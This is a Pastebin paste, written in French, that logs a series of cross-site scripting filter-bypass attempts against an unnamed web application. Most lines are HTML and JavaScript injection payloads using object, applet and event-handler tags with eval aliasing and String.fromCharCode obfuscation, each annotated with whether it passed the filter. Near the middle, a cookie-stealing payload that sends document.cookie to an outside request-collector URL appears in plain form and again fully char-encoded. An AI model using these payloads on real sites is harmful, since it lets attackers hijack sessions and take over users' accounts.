Advertisement
Guest User

Untitled

a guest
Jan 18th, 2018
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.28 KB | None | 0 0
  1. <object><param value></param></object>
  2.  
  3.  
  4.  
  5. <object><param value></param></object>
  6.  
  7.  
  8. ceci passe
  9.  
  10.  
  11. name="src" value=
  12. "javascript:alert(0)">
  13.  
  14. <object><param name=src value=></param></object>
  15. ok ceci passe
  16.  
  17. <object><param name=src value=javascript></param></object>
  18. ok ceci passe
  19.  
  20. <object><param name=src value=javascript:alert(0)></param></object>
  21. non ceci ne passe pas
  22.  
  23. <object><param name=src value=javascript:></param></object>
  24. non le : fout la merde
  25.  
  26. <object><param name=src value=a=eval;b=alert;a(b((String.fromCharCode(88,83,83)));></param></object>
  27. passe mais non interprété
  28.  
  29. <object><param name=onerror value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></param></object>
  30. passe mais non interprété
  31.  
  32. <html><title>{}</title></html>
  33. ok ceci passe
  34.  
  35. <html><title>{}</title></html>
  36. ok ceci passe
  37.  
  38. <html><title>{a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));}</title></html>
  39. ceci passe mais non interprété
  40.  
  41. <html><title>{a=eval;b=alert;a(b('xss'));}</title></html>
  42. xss détecté
  43.  
  44. <b "<
  45. passe
  46.  
  47. <sCrIpt>alert(1)</ScRipt>
  48. Ne passe pas,
  49.  
  50.  
  51. <applet passe aussi
  52. <object codebase= >tata</object> ok
  53. continue de test
  54.  
  55. <object codebase=https://requestb.in/186lk5x1?admin >tata</object>
  56.  
  57. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=></OBJECT>
  58. ceci passe
  59.  
  60. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(123));></OBJECT>
  61.  
  62. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></OBJECT>
  63.  
  64. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;b=alert;a(b(String.fromCharCode(88,83,83)));></OBJECT>
  65. ceci passe
  66.  
  67.  
  68. Code à injecter :
  69. document.location('https://requestb.in/186lk5x1/?cookie='+document.cookie)
  70.  
  71. il faut le mettre en char code
  72.  
  73. <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=a=eval;a(String.fromCharCode(100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,40,39,104,116,116,112,115,58,47,47,114,101,113,117,101,115,116,98,46,105,110,47,49,56,54,108,107,53,120,49,47,63,99,111,111,107,105,101,61,39,43,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41););></OBJECT>
  74.  
  75. ceci passe mais pas de résultats
  76.  
  77. <applet java_codebase=http://someurl java_object=xss.ser></applet>
  78.  
  79.  
  80. #$%&()*~+-_.,:;?@[/|\]^
  81.  
  82. !`
  83.  
  84. cela a l'air de marché
  85.  
  86. t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));
  87.  
  88. <a onerror!=prompt('1') >aa</a>
  89.  
  90. <a onerror!=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
  91.  
  92. <a onerror#=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
  93.  
  94. <a onerror`t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a> passe pas
  95.  
  96. <a onerror%=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
  97.  
  98. <a onerror$=t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a>
  99.  
  100.  
  101. <a onmouseover />
  102. =t=eval;b=alert;t(b(String.fromCharCode(88,83,83))); > caca </a> nok
  103.  
  104. <a onmouseover#=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> n'interprète pas
  105.  
  106. <a onmouseover=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> cela passe en sur
  107.  
  108. <a onmouseover=t=eval;b=alert;t(b(String.fromCharCode(88,83,83)));l>aa</a> passe pas avec $!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement